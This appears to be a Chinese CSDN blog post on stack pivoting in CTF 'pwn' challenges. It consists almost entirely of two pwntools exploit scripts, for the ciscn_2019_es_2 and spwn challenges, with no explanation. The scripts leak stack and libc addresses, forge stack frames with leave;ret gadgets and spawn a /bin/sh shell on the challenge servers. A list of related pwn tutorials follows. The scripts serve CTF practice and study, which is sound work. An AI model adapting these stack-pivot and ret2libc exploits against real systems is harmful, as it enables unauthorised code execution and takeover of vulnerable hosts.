pwn 栈迁移之伪造栈帧

于 2021-05-02 00:29:37 发布
阅读量189 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42689613/article/details/116334923
版权

目录

ciscn_2019_es_2

#!/usr/bin/env python2
# coding=utf-8
from pwn import *

arch = "i386"
filename = "ciscn_2019_es_2"

context(os="linux", arch=arch, log_level="debug")
content = 1

offset = 0
# elf
elf = ELF(filename)
leave_ret=0x08048562
system_addr=0x08048559
# libc


def b(addr):
    bk = "b *" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("node3.buuoj.cn",28340)
    gdb.attach(io,b'b read')
    payload=b'a'*(0x24)
    io.send(payload)
    io.recvuntil("Hello, ")
    io.recvuntil(b'a'*(0x24))
    addr=u32(io.recv(4))
    print("addr:",hex(addr))   #228
    io.recv()
    payload=b'aaaa'+p32(system_addr)+p32(addr-216)+b'/bin/sh\x00'
    payload=payload.ljust(0x28,b'a')
    payload+=p32(addr-228)+p32(leave_ret)
    io.sendline(payload)
    io.interactive()
main()

spwn

#!/usr/bin/env python2
# coding=utf-8
from pwn import *

arch = "i386"
filename = "spwn"

context(os="linux", arch=arch, log_level="debug")
content = 1

offset = 0
# elf
elf = ELF(filename)
s_addr=0x0804A300
leave_addr=0x08048408
puts_plt=elf.plt['puts']
write_plt=elf.plt['write']
write_got=elf.got['write']
puts_got=elf.got['puts']
main_addr=elf.symbols['main']
# libc
libc=ELF("16-32libc-2.23.so")
puts_libc=libc.symbols['puts']
write_libc=libc.symbols['write']
sys_libc=libc.symbols['system']
binsh_libc=next(libc.search(b'/bin/sh'))

def b(addr):
    bk = "b *" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("node3.buuoj.cn",28531)
    #leak
    io.recvuntil('What is your name?')
    payload=b'aaaa'+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
    #payload = b'aaaa' + p32(puts_plt) + p32(main_addr) + p32(puts_got)
    io.send(payload)
    io.recvuntil('What do you want to say?')
    payload=b'a'*(0x18)+p32(s_addr)+p32(leave_addr)
    io.send(payload)
    write_addr=u32(io.recv(4))
    print("write_addr:",hex(write_addr))
    #count
    libcbase=write_addr-write_libc
    #libcbase = write_addr - puts_libc
    sys_addr=libcbase+sys_libc
    binsh_addr=libcbase+binsh_libc
    #getshell
    io.recvuntil('What is your name?')
    payload = b'aaaa' + p32(sys_addr) + p32(main_addr) + p32(binsh_addr)
    io.send(payload)
    io.recvuntil('What do you want to say?')
    payload = b'a' * (0x18) + p32(s_addr) + p32(leave_addr)
    io.send(payload)
    io.interactive()
main()
qingmu-z
关注
32C3之PWN题目Readme的解法
HappyOrange2014的专栏
01-04 5904
本题是2015年32C3CTF比赛中一道300分的pwn题目,也是我第一次在赛后看着writeup做出的pwn题目,希望下次能够在赛中做出pwn题目。话说,忙碌的工作和生活之余,学习一点安全分析的知识,也是很快乐的一件事情!
pwn入门——4.&栈帧
weixin_62626298的博客
07-29 722
是一种典型的后进先出 (Last in First Out) 的数据结构,其操作主要有压 (push) 与出 (pop) 两种操作,如下图所示。两种操作都操作顶,当然,它也有底。
调整栈帧技巧 | 劫持指针
Sakura给爷pwn全场
12-12 199
参考链接 https://www.cnblogs.com/ichunqiu/p/11238429.html
溢出的神奇利用思路之迁移
Sakura给爷pwn全场
01-30 255
迁移原理图示: https://www.cnblogs.com/yichen115/p/12450517.html
一个简单的pwn例子---read函数
qq_41683305的博客
03-21 4134
内容: #include<stdio.h> void exploit() { system("/bin/sh"); } void func() { char str[0x20]; read(0, str, 0x50); } int main() { func(); return 0; } 我们要做的是利用溢出执行exploit函数 分析: 先...
arg是什么函数_CTF必备技能丨Linux Pwn入门教程——针对函数重定位流程的相关测试(上)...
weixin_39799565的博客
11-23 260
Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程。教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如,堆,整数溢出,格式化字符串,条件竞争等进行介绍,所有环境都会封装在Docker镜像当中,并提供调试用的教学程序,来自历年赛事的原题和带有注释的pyth...
PWN入门之迁移-附件资源
03-02
PWN入门之迁移-附件资源
pwn--迁移
weixin_44642009的博客
04-17 1002
迁移–ROP 本次实验我们使用lab4的可执行文件。 在开始之前我们需要明确一些问题以及需要注意的地方,以下我会讲到,这也是在实验过程中我碰到的一些情况和解题关键: 为什么使用迁移? 由上图可知,程序开辟的堆大小是0x50字节,而read函数输入可以输入0x60字节,明显存在溢出的可能,不过可输入的字节数不是足够多,空间较小,不足以使我们填入足够的ROP链,所以我们需要迁移。 ...
PWN 迁移入门解说 [Black Watch 入群题]PWN
weixin_45441024的博客
11-30 675
PWN迁移解说 适用情况: 1.溢出的长度不足以让我们把ROP写进去 2.程序开启了的不可执行保护 基础知识: 我们迁移的目的就是将我们在上不可执行的链子转移到data段或者bss段上面 ,这里就需要用到leave;ret了,在这一类的题型中我们是构造并使用两次leave,来将ebp转移到我们构造的后门的起始位置。 寻找leave;ret需要用到ROPgadget这个工具 $ ROPgadget --binary '/home/pwn/Desktop/bbys_tu_2016' --only
ctf pwn 个人经验记录
jmp esp
05-22 8923
前言记录一下自己在做pwn的过程当中学到的一些东西,以前不知道的东西等等,碰到的坑也会记录在 这里,主要目的是帮助自己记录一下经验。其实每一道题基本上能学到的新东西是有限的,记录下来避免什么时候想不起来。顺序比较乱,基本上根据我做题的顺序定的,比较随意。pwnother place(not from ctf) 多用gdb调试,有思路可以先写出来调试一下看看效果再说 遇见pie考虑写malloc_h
BugkuCTF练习平台pwn3(read_note)的writeup
只影的博客
03-05 1514
在Bugku的pwn题中,这道题分值最高,也是难度最大的一道。难点在于,第一要读懂题目找出漏洞,第二是要绕过各种保护机制,第三是exp的编写调试。看一眼程序的保护机制,发现除了RELRO所有保护全开,还是有点头疼的,毕竟我刚开始学pwn没几天,还没有做过PIE和Canary的题目,所以调试还是花了不少时间的。 首先分析程序,重要部分如下所示。一开始会让你输入一个路径,不存在的话就会报错推出,然后打...
pwn调整栈帧的技巧
sea_time的博客
12-05 1128
调整栈帧的技巧 我们在存在溢出程序中,经常会碰到一些关于的问题,比如开启ASLR导致地址不可预测,所能溢出的字节数太少等等。对于这些问题,我们有时候可以通过gadgets来调整栈帧以完成攻击。比如我们所用到的常见手段,包括esp值的加减,利用部分溢出字节来修改ebp的值来进行stack pivoting等。 0x00 扩大空间 正常来说,当空间不够用时我们是写入bss段中的,那有什么办...
栈帧结构
pspdragon的博客
11-02 556
%esp寄存器存储顶地址 %ebp寄存器存储各帧首地址 在x86中%ebp变成了%rbp,%esp变成了%rspint son_add(int a, int b) { return a+b; }int father() { int a = 8; int b = 9; int sum = 0; sum = son_a
绕过缓冲溢出防护系统
04-27 1357
绕过缓冲溢出防护系统--[1-介绍近来一段时间,一些商业化的安全机构开始提出一些方案来解决缓冲区溢出问题。本文分析这些保护方案,并且介绍一些技术来绕过这些缓冲区溢出保护系统.现在不少商业化组织创造了许多技术来防止缓冲区溢出。最近,最流行的一种技术是回溯技术,它是一种最容易实现的防溢出技术,但是同时它也是最容易被攻击者绕过的一项技术.值得一提的是,许多著名的商业化产品,比如Enterc
Linux下pwn从入门到放弃
12-17 180
Linux下pwn从入门到放弃 0x0 简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。 虽然web系统在互联网中占有比较大的分量,但是随着移动端,ioT的逐渐流行,传统的缓冲区溢出又一次有了用武之处 0x01 工欲善其事,必先利其器 Linux下的pwn常用到的工具有: gdb:Linux调试中必要用到的 gdb-peda:gdb方...
攻防世界pwn之新手练习区
bahuishi9641的博客
07-30 1439
0x00 get_shell 题目描述:运行就能拿到shell呢,真的 from pwn import * io = remote('111.198.29.45','36389') io.interactive() 0x01 CGfsb 题目描述:菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 1.基本信息: Arch: i386-32-little ...
用于去噪幅度dMRI的Matlab工具箱.rar
10-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
APP报毒全自动处理系统源码
最新发布
10-09
APP报毒全自动处理系统源码
ctfshow PWN 溢出
08-23
在ctfshow PWN中,溢出是一种常见的攻击方式。 根据提供的引用,我了解到溢出是一种通过向程序输入过长的数据导致数据溢出的一种攻击手段。是一种数据结构,用于存储程序的局部变量和函数调用的返回地址等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值